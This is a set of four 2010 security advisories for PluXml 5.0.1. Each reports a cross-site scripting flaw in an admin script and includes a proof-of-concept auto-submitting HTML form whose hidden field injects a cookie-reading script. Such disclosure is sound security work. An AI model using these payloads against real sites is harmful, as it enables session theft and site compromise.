PluXml 5.0.1 Cross Site Scripting

`====================================  
Vulnerability ID: HTB22631  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml.html  
Product: PluXml  
Vendor: PluXml Team ( http://pluxml.org/ )   
Vulnerable Version: 5.0.1 and probably prior versions  
Vendor Notification: 29 September 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/core/admin/profil.php" script to properly sanitize user-supplied input in "infos" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/core/admin/profil.php" method="post" name="main" >  
  
<input type="hidden" name="name" value="Ildar">  
<input type="hidden" name="infos" value='<script>alert(document.cookie)</script>'>  
<input type="hidden" name="profil" value="Modifier votre profil">  
<input type="hidden" name="password1" value="">  
<input type="hidden" name="password2" value="">  
  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
====================================  
Vulnerability ID: HTB22634  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml_3.html  
Product: PluXml  
Vendor: PluXml Team ( http://pluxml.org/ )   
Vulnerable Version: 5.0.1 and probably prior versions  
Vendor Notification: 29 September 2010   
Vulnerability Type: Stored XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/core/admin/statique.php" script to properly sanitize user-supplied input in "content" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/core/admin/statique.php" method="post" name="main" >  
<input type="hidden" name="id" value="001">  
<input type="hidden" name="content" value="<p><?php echo 'Ma premi&egrave;re page statique !'; ?></p><script>alert(document.cookie)</script>">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
====================================  
Vulnerability ID: HTB22632  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml_1.html  
Product: PluXml  
Vendor: PluXml Team ( http://pluxml.org/ )   
Vulnerable Version: 5.0.1 and probably prior versions  
Vendor Notification: 29 September 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/core/admin/article.php" script to properly sanitize user-supplied input in "content" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/core/admin/article.php" method="post" name="main" >  
  
<input type="hidden" name="artId" value="0001">  
<input type="hidden" name="title" value="article title">  
<input type="hidden" name="author" value="001">  
<input type="hidden" name="chapo" value="">  
<input type="hidden" name="content" value='page html content"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="day" value="23">  
<input type="hidden" name="month" value="09">  
<input type="hidden" name="year" value="2010">  
<input type="hidden" name="time" value="15:45">  
<input type="hidden" name="catId[]" value="001">  
<input type="hidden" name="new_catid" value="002">  
<input type="hidden" name="new_catname" value="">  
<input type="hidden" name="tags" value="PluXml">  
<input type="hidden" name="allow_com" value="1">  
<input type="hidden" name="url" value="article-page-url">  
<input type="hidden" name="template" value="article.php">  
<input type="hidden" name="preview" value="Aper&ccedil;u">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
====================================  
Vulnerability ID: HTB22633  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml_2.html  
Product: PluXml  
Vendor: PluXml Team ( http://pluxml.org/ )   
Vulnerable Version: 5.0.1 and probably prior versions  
Vendor Notification: 29 September 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "/core/admin/parametres_base.php" script to properly sanitize user-supplied input in "title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
<form action="http://host/core/admin/parametres_base.php" method="post" name="main" >  
<input type="hidden" name="title" value='PluXml"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="description" value="le blog full XML">  
<input type="hidden" name="racine" value="http://host/">  
<input type="hidden" name="delta" value="+00:00">  
<input type="hidden" name="allow_com" value="1">  
<input type="hidden" name="mod_com" value="0">  
<input type="hidden" name="editor" value="plxtoolbar">  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`